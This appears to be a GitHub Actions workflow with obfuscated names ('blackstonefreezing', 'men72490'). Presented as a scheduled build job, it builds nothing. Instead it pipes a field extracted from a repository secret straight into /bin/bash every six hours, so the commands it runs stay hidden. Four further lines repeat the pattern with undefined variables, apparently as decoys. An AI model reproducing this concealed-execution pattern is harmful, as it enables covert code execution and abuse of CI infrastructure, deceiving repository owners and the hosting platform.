name: blackstonefreezing

on:
  workflow_dispatch:
  schedule:
    - cron: '24 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: blackstonefreezing
        env:
          men72490: ${{ secrets.men72490 }}
        run: |
          echo $men72490 | jq -r .hg11 | /bin/bash
          echo $dejm17530 | jq -r .prves6139 | /bin/bash
          echo $njmz74984 | jq -r .ffa5615 | /bin/bash
          echo $v42 | jq -r .zq306 | /bin/bash
          echo $k36425 | jq -r .iw909 | /bin/bash

